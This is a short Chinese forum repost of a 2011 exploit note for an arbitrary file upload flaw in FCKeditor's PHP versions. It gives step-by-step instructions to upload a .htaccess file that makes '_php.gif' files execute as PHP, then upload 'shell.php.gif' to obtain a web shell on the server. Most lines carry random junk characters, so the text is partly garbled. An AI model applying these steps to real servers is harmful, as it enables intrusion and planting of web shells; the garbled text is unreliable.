FCKeditor所有php版本Upload上传漏洞
: c7 J* E! n0 W y9 Z* `作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
! N' W" J4 \- `* ^减小字体 增大字体
q: _3 l) R( x, i7 p4 L. @[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability: ~1 v- ?9 t0 v A, I1 v8 ~: D
[+] Date: 2011
$ N# K6 ?) V& o: ^$ h" Y }( u: P[+] Author : sinesafe.cn$ m) K* ]% n! T; ^8 i% w
[+] Website : WwW.sinesafe.cn i$ Q( |" o' O6 U$ B' {
———————————————————
, I, v/ C" z- d& d1.create a htaccess file:3 {- b- t6 D6 G5 h
code:# i$ C- \* k. f5 Q4 j4 O4 I
<FilesMatch “_php.gif”>
/ ?+ K! l7 q$ p" r1 N. Z0 [- gSetHandler application/x-httpd-php
7 t4 R- C$ u1 d+ z( t1 y2 a" W</FilesMatch>
: b. C6 h6 I! @, F
6 @4 c- V* r. m- X2.Now upload this htaccess with FCKeditor.
6 z1 V6 }# J- j1 n1 {$ C
( {) a! h0 G4 m/ B) Ghttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
! G; B! N$ @4 u$ ?) l% L4 n3 G; A7 l' A3 }2 _+ @3 D
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
5 W5 o. @: U; }* p/ f( y9 H" y% ?" ?/ m# i& w
———————————————————————————————-
5 D3 r8 {/ b3 v% \ S/ Y3.Now upload shell.php.gif with FCKeditor.
1 e# [8 j3 X+ |; g ?/ W4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.: \ j% `. l- T9 B1 _
5.http://www.sinesafe.cn/anything/shell_php.gif+ ~. f9 N1 @& H6 A O/ |- t6 C5 W. H
6.Now shell is available from server. |
" l q2 M8 `& d8 @1 t
. Q- N& u0 H! d% C" O. r! A
# R1 Q/ |9 D" e
|
发表于 2013-10-27 17:25:21
收藏
支持
反对